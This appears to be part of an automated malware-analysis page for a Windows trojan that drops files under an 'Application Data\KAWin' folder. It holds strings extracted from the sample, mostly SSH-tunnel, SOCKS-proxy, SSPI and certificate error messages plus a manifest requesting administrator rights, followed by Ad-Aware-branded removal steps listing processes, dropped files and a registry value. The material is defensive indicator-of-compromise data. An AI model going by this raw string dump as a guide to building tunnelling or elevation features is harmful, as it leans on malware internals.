Number of certs in chain exceeds 20, stopping.

nextCertSerial

nextCertDn

initialCertSerial

initialCertDn

.?AVKeyContainer@@

Failed to export private key (3)

Failed to export private key (2)

Failed to export private key (1)

Detecting windows-125* code page.

windows-125

Closing SSH Channel. (SSH tunnel remains open.)

Connection is SSH...

No SSH channel.

Setting TCP_NODELAY

No SSH connection established!

SshChannelNum

[SSH] Direct TCP/IP channel successfully opened.

SSH server disconnected.

Failed to open direct-tcpip channel

Opening new SSH channel within SSH tunnel.

Failed to allocated new SSH channel

Unencrypted TCP/IP

SSH Tunnel

No SSH channel for reading.

Disconnected on SSH channel.

Received Close on SSH channel.

Received EOF on SSH channel.

HTTP/1.1

proxyPort

!"#$%*;<=>@[]^`{|}

DomainKey-Signature

WSAStartup error: 0x%x

Limit on the number of tasks supported by the Windows Sockets implementation has been reached.

A blocking Windows Sockets 1.1 operation is in progress.

The version of Windows Sockets support requested is not provided by this particular Windows Sockets implementation.

Using ws2_32.dll version %d,%d

BindPort

Check to make sure the connection is not blocked by a firewall or anti-virus port filtering.

Error %x

WSAEADDRINUSE Only one usage of each socket address (protocol/network address/port) is normally permitted.

For more information see this Chilkat Blog post: hXXp://VVV.cknotes.com/?p=217

WSAENETUNREACH A socket operation was attempted to an unreachable network.

WSAESOCKTNOSUPPORT The specified socket type is not supported in this address family.

WSAEPROTONOSUPPORT The specified protocol is not supported.

WSAEINPROGRESS A blocking Windows Sockets 1.1 call is in progress, or the service provider is still processing a callback function.

WSAEAFNOSUPPORT The specified address family is not supported.

For more information see this Chilkat Blog post: hXXp://VVV.cknotes.com/?p=91

For more information see this Chilkat Blog post: hXXp://VVV.cknotes.com/?p=210

127.0.0.1

IP address passed to DNS lookup

socket operation aborted by application callback

socket operation aborted by application callback..

%d.%d.%d.%d

The peer has closed the socket (TCP) connection

Wait-for-data passed invalid socket.

Failed to receive on the TCP socket

Failed to receive data on the TCP socket

Failed to allocate buffer in Socket.ReadN

text/webviewhtml

image/pipeg

application/ynd.ms-pkipko

application/x-pkcs7-certreqresp

application/x-pkcs7-certificates

application/vnd.ms-works

application/vnd.ms-project

application/vnd.ms-powerpoint

application/vnd.ms-pkistl

application/vnd.ms-pkiseccat

application/vnd.ms-pkicertstore

application/vnd.ms-excel

.?AVCertStoreSpec@@

invalid length passed to BER decoder

null reference passed to BER decoder

key part was empty!

Content is missing for key part.

key part length is zero.

Failed to get chunked HTTP proxy response (3)

Failed to get chunked HTTP proxy response (2)

Failed to get chunked HTTP proxy response (1)

No HTTP proxy hostname and/or port

Failed to connect to HTTP proxy server.

Reading chunked HTTP proxy response...

HttpProxyConnect

No SOCKS4 hostname and/or port

socksPort

No SOCKS5 hostname and/or port

IPv6 addresses not yet supported.

Failed to receive port reply from SOCKS5 server.

SOCKS5 server rejected username/password

Failed to receive username/password reply from SOCKS5 server.

Failed to send username/password to SOCKS5 server.

SOCKS5 password is empty.

SOCKS5 server selected username/password authentication.

No SOCKS5 username and/or password, requesting No-Authentication...

PKCS12 derive key failed.

security.dll

secur32.dll

Failed to acquire alternate credentials: no username and/or password

ChilkatSSPI.prepareOutboundPackage: package index out of range

ChilkatSSPI.prepareOutboundPackage: SEC_I_COMPLETE_AND_CONTINUE

ChilkatSSPI.prepareOutboundPackage: SEC_I_COMPLETE_NEEDED

ChilkatSSPI.prepareOutboundPackage: SEC_E_NO_AUTHENTICATING_AUTHORITY

ChilkatSSPI.prepareOutboundPackage: SEC_E_NO_CREDENTIALS

ChilkatSSPI.prepareOutboundPackage: SEC_E_INTERNAL_ERROR

ChilkatSSPI.prepareOutboundPackage: SEC_E_TARGET_UNKNOWN

ChilkatSSPI.prepareOutboundPackage: SEC_E_INVALID_HANDLE

No username and/or password for SSPI authenticate.

ChilkatSSPI.authenticate: failed to prepare next package

ChilkatSSPI.authenticate: exchange failed

ChilkatSSPI.authenticate: failed to prepare 1st outbound package

ChilkatSSPI.authenticate: cannot acquire alternate credentials

ChilkatSSPI.authenticate: no package exchange object

s2_ReceiveBytes.RecvSecure.bEndOfSession

s2_ReceiveBytes.RecvSecure.bConnectionClosed

s2_ReceiveBytes.RecvSecure.b

SSL Server Certificate verified

Failed to verify server certificate

(warning) SSL Server Certificate not verified

Error querying remote certificate

Secur32.dll

Security.dll

SSL Server Certificate verified.

(warning) SSL Server Certificate not verified.

certValue

SSL server certificate fails to match requirement

ClientCertDN

windowsAccount

HTTP/1.0

Possible solution: Check to see if your server requires a client-side certificate. If so, it can be provided by calling SetSslClientCert prior to connecting.

CERT_E_WRONG_USAGE

CERT_E_CN_NO_MATCH

CERT_E_REVOCATION_FAILURE

CERT_E_REVOKED

CERT_E_CHAINING

CERT_E_UNTRUSTEDROOT

CERT_E_MALFORMED

CERT_E_ISSUERCHAINING

CERT_E_PURPOSE

CERT_E_CRITICAL

CERT_E_PATHLENCONST

CERT_E_ROLE

CERT_E_VALIDITYPERIODNESTING

CERT_E_EXPIRED

Status = 0x%x

This warning may be caused by using an IP address or a hostname that differs from that found in the certificate.

Error building certificate chain

MultibyteToWideChar failed in VerifyServerCertificate

Out of memory in VerifyServerCertificate

Hostname is empty in VerifyServerCertificate

Certificate parameter is null in VerifyServerCertificate

Verifying server certificate...

keyExchangeStrength

keyExchange

buf_%d

.?AUSshChannel@@

%Documents and Settings%\%current user%\Application Data\KAWin\Console.exe

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

Arrange Icons/Arrange windows so they overlap

Cascade Windows5Arrange windows as non-overlapping tiles

Tile Windows5Arrange windows as non-overlapping tiles

Tile Windows(Split the active window into panes

Replace%Select the entire document

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   SLIPI.exe:1988
   Console.exe:1852
   %original file name%.exe:1328

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Application Data\KAWin\runaservice.exe (3312 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\CONSOLE.ZIP (150349 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\conf.ini (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
   %Documents and Settings%\%current user%\Application Data\KAWin\core.dll (84642 bytes)
   %Documents and Settings%\%current user%\Application Data\KAWin\conf.ini (2 bytes)
   %Documents and Settings%\%current user%\Application Data\KAWin\service.ini (41 bytes)
   %Documents and Settings%\%current user%\Application Data\KAWin\Console.exe (38103 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CONSOLE_201303[1].ZIP (307680 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\kadata_00 (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\413818EE9DB253AE098C969051EFB68A (140 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\413818EE9DB253AE098C969051EFB68A (1 bytes)
   %Documents and Settings%\All Users\Application Data\ConsoleLogs\2015-06-20.htm (687 bytes)
   %Documents and Settings%\All Users\Application Data\ConsoleLogs\tmpemail.htm (687 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\SLIPI.exe (2784 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
   "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.